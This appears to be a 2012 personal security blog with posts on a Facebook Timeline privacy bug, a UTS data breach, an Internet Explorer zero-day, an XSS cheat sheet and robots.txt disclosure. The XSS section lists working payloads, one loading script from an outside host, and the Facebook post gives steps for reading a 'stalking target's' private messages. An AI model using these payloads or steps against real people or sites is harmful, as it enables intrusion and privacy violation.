Well, well, well... looks like they've done it again. Facebook has created yet another serious privacy concern for their users, and it appears to be accidental, not deliberate like others (Check-In, I'm looking at you).
This time, the private messages of Facebook users have been exposed to their friends, and possibly the world, as a result of a bug in the new Timeline system. Thanks to this programming glitch, private messages, juicy conversations and personal data are just a few clicks away from anyone who wishes to access them. Below are the easy steps to try this for yourself:
1. Go to your stalking target's timeline.
2. Select 2010 from the date list down the right-hand side of the page.
3. Look at the part of their page with the heading: "14 friends posted on [Target]'s timeline."
4. The "wall posts" in this list are actually private messages (image below). The replies to them are the conversation.
No doubt, this will result in some very bad press for Facebook and heads will be rolling within the development team. I wouldn't even be particularly surprised to see legal action being taken against the social media giant given the potential for leakage of private information. I can already see celebrity gossip stemming from this very glitch.
All in all, this will just be another nail in the coffin for individual privacy on the internet. How could such a glitchy piece of code be published by such a large corporation? Damned if I know, but one thing's for sure: it definitely isn't going to end well for Mark Zuckerberg or his clients.
Saturday, 29 September 2012
Monday, 24 September 2012
University of Technology Hacked? Update: UTS Breach, Users notified.
This weekend I decided that I was going to pay a visit to zone-h.org, the website on which hackers present their "defacements" of hacked websites. Going through the list, it was apparent that most of the hacked websites weren't big targets, just general unsecured sites riddled with vulnerabilities. However, after going through some pages, I found this:
Update: Many people have written articles on this -
http://www.smh.com.au/it-pro/security-it/hackers-breach-deface-uts-website-20120925-26i4j.html#ixzz27TM6GAw6
http://www.zdnet.com/au/hackers-deface-old-uts-system-dump-user-database-7000004694/
They state that they detected the breach and it was an old server. Still scary news though.
The University of Technology's servers seem to have been breached on 2012-09-22 at 01:10:38. This was only two days ago.
The server which was defaced was: http://datasearch.uts.edu.au
Looking through this, all I see is a blank page with a single word, "Datasearch". It seems almost as if UTS has covered up their tracks.
Through analysing the hackers' message, it seems this was a targeted hack, based on the text written: "Dear, Ugliest Tower In Sydney. Hire some staff who actually know what they are doing. BTW, I just RM -RFd you bitches. That should teach you a lesson."
The greets to ASIO seem to be related to, or in response to, this: http://www.abc.net.au/news/2012-09-21/asio-wants-phone-and-email-data-stored-for-two-years/4272982
Now here comes the scary bit. These hackers have not only breached the servers, but have also released the majority of what appears to be a staff or user database.
Going further down in the defacement we can see the details of approximately 757 people, all from UTS or linked in some way. These include usernames, passwords, emails and the works. If almost one thousand people were breached from a well known university in Australia, then why the heck has this not been reported, or been dealt with appropriately?
I have my respect for universities, but this is wrong! If a breach were to occur due to sloppy coding on our end, the first thing I would do is report the breach to those affected IMMEDIATELY.
Even though the data dates back to 2002, you would be surprised how many people still use the same passwords. Even worse, these passwords are all in plain text. How convenient for the hackers.
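For contrast, here is a minimal sketch of how passwords can be stored as salted hashes instead of plain text (Python, purely illustrative; this is not how UTS actually stores anything):

import hashlib
import hmac
import os

def hash_password(password):
    # Random per-user salt so identical passwords do not produce identical hashes.
    salt = os.urandom(16)
    # Slow, salted hash: PBKDF2-SHA256 with 100,000 iterations.
    digest = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
    # Constant-time comparison to avoid timing side channels.
    return hmac.compare_digest(candidate, digest)

Even if a database of salt and digest pairs leaks, an attacker still has to brute-force every password individually instead of reading them straight off the page.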
UTS, I don't know who you hire for your web security, and network security in general. But given the recent hacks on other popular Australian universities (the University of Sydney and UNSW), and considering you pride yourselves on being a university focused on technology, this is the wrong way to go.
As of yet, this doesn't seem to have been blogged about, and I find it quite appalling that a breach can happen without those affected knowing about it.
You would think that people would be getting more secure as the days go by, but honestly, it seems that either a) people lack the knowledge to secure themselves, or b) hackers are excelling at breaking through that security.
That's all for now,
Shubham
Labels:
apollo,
asio,
breach,
data leak,
defaced,
passwords,
sql injection,
university of technology,
UTS Hacked,
web security
Tuesday, 18 September 2012
Another 0day in the wild. This time Internet Explorer.
Just recently, the internet experienced a Java exploit in the wild. Now, from the same creators, a new 0day has been found, this time affecting Internet Explorer as a whole. Unlike the Java exploit, which targeted a product that has constantly been known for its crappy security, this time malware engineers have targeted Internet Explorer, and have been successful.
What I find extremely stupid is that Eric Romang (http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/) was able to find this 0day located on the SAME server as the previous Java 0day. Personally, I think this exploit was not created by the people running that server, but was rather distributed or sold for a very high price on the backbones of Russian black markets such as antichat.
A simple diagram explains the simplicity of this vulnerability:
Source (http://labs.alienvault.com)
Microsoft suggests blocking ActiveX controls for now, and waiting for the newest Internet Explorer 10, which supposedly fixes this issue. If one were smart, however, one would not be using Internet Explorer at all ;)
Other than this, from my observations, this exploit has gone to total waste! Such an exploit on the black markets could be sold for up to $20k a pop, meaning that the author must be absolutely devastated right now.
Why would it cost so much, you ask? Think about this. As an example, take Russian monetisers who use malware as their main platform. The process would be exceedingly simple and profitable for them: firstly, buy this exploit; secondly, load their malware onto it; and thirdly, buy traffic originating from developing countries such as India, Pakistan and Vietnam, where Internet Explorer is more likely to be in use. With a constant traffic flow from their usual sources, they would see an infection rate of almost 60-70% when done en masse.
Let us calculate this. Say 100k visitors were sent; at a 50% infection rate, that is 50k new infections the Russian monetisers would have gained in about a week. With those 50k machines they would be able to mine for bitcoins or simply sell their slaves as SOCKS5 proxies. The money in this runs into the thousands.
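As a rough back-of-the-envelope sketch in Python, using the same illustrative guesses as above (none of these figures are real; the per-bot value is my own assumption):

# Illustrative numbers only - exploit price, traffic volume and resale value are all assumptions.
exploit_cost = 20000       # USD, rumoured going rate for such a 0day
visitors = 100000          # bought traffic sent to the exploit page
infection_rate = 0.5       # assumed infection rate
value_per_bot = 1.0        # assumed resale value per SOCKS5 proxy, in USD

bots = int(visitors * infection_rate)
profit = bots * value_per_bot - exploit_cost
print(bots, profit)        # 50000 bots, 30000.0 USD profit with these assumptions

Change any of the assumptions and the numbers swing wildly, but the point stands: the exploit pays for itself very quickly.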
Anyways, enough of my rambling. It was an absolutely great find, and unbelievable that the exploit was located on already blacklisted servers (how stupid?). Stay safe, and be smart: simply don't use Internet Explorer.
P.S. For a very in-depth analysis of the code, I suggest you visit http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/, which takes a much more programmatic approach to this 0day. Also, a Metasploit module has already been created for this vulnerability.
Saturday, 15 September 2012
XSS Cheat Sheet! Including HTML 5 Vectors.
HTML5 Vectors -
Vectors by Gareth Heyes. Some vectors also from HTML5Sec.
Regular Vectors from RSnake
HTML5 Web Applications
<input autofocus onfocus=alert(1)>
-------------------------------------------------------------
<select autofocus onfocus=alert(1)>
-------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>
-------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
-------------------------------------------------------------
<form id="test"></form><button
form="test"
formaction="javascript:alert(1)">X</button>
-------------------------------------------------------------
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
-------------------------------------------------------------
<video onerror="javascript:alert(1)"><source></source></video>
-------------------------------------------------------------
<form><button formaction="javascript:alert(1)">X</button>
-------------------------------------------------------------
<body oninput=alert(1)><input autofocus>
-------------------------------------------------------------
<frameset onload=alert(1)>
HTML Web Applications
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
-------------------------------------------------------------
'';!--"<XSS>=&{()}
-------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT>
-------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
-------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
-------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//">
-------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');">
-------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');">
-------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
The fuzzdb includes hundreds of XSS vectors:
http://code.google.com/p/fuzzdb/source/browse/trunk/fuzzdb/xss/xss-rsnake.txt?r=42
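If you want to try vectors like these against your own application, here is a minimal sketch (Python; the target URL and the "q" parameter are made up for illustration, and you should only ever point this at something you own) that checks whether a payload is reflected back unescaped:

import urllib.parse
import urllib.request

# Hypothetical target: a page that echoes the "q" parameter back into its HTML.
TARGET = "http://localhost:8000/search?q="

vectors = [
    "<input autofocus onfocus=alert(1)>",
    "<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
]

for vector in vectors:
    url = TARGET + urllib.parse.quote(vector)
    with urllib.request.urlopen(url) as response:
        body = response.read().decode("utf-8", errors="replace")
    # If the payload comes back unescaped, the parameter is a likely XSS candidate.
    print(vector, "->", "REFLECTED" if vector in body else "not reflected")

A reflected payload is only a candidate; you still need to confirm it actually executes in the browser.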
Labels:
alert,
application,
aspx,
autofocus,
cfm,
cross site scripting,
fuzzdb,
html,
html 5 vectors,
html5,
javascript,
onfocus,
onload,
onprompt,
php,
rsnake,
script,
src,
web security,
xss cheat sheet
Robots.txt files, and why they matter!
Believe it or not, one important factor in web security has gone largely unacknowledged. The robots.txt file is used by the majority of webmasters to disallow the indexing of sensitive files. The problem with this is that anyone has access to your robots file, and you MUST make sure that nothing important gets disclosed through it.
Many servers hold files called "robots.txt" in their root directory in order to dictate to search engines what is allowed to be indexed, cached and listed in search results. Furthermore, these can be combined with sitemaps in order to specify the URLs that search engines should index.
Now, there's one big flaw in this. Suppose we had a webmaster called Joe, and he didn't want search engines to index a private directory called "privatedirectory". He'd proceed to list it in his robots.txt file like this:
User-agent: *
Disallow:
Disallow: /privatedirectory
Have you spotted the flaw? It's blatantly obvious! What if someone simply visited the robots.txt file of any given server at any given time? That would cause the disclosure of the very directory that Joe obviously wished not to disclose.
So how do you make proper robots.txt files? Use sitemaps! Don't list any private or sensitive directories directly in the robots file, and try to use the Allow method rather than the Disallow method shown above, as in the sketch below.
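As a rough sketch of that approach (the paths and sitemap URL here are made up for illustration), a safer robots.txt whitelists the public areas and points crawlers at a sitemap, without ever naming the sensitive directory:

User-agent: *
Allow: /public/
Disallow: /

Sitemap: http://example.com/sitemap.xml

This way, the only thing robots.txt reveals is what you already want indexed; the private paths live only in your server configuration, not in a world-readable text file.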
Personally, back in 2009, I was talking to a few blackhats on IRC and I asked them what was potentially one of the stupidest things that had helped them get through layers of security. They told me that they were pentesting an ISP and had found an SQL injection that led to the disclosure of admin passwords, but were stuck at that point. They had no idea what the admin directory was, and had tried all sorts of methods to find it. In the end, they realised that the answer to where it was located was sitting in plain text in the robots file, which had disallowed the indexing of a directory called "/a1d2m3i4n5". This is quite shocking, as not only should an ISP never have SQLi in the first place, but they should also NEVER place such sensitive directories in the robots file.
This concludes my ramble on the robots file. I hope it helps you in whatever position you are in.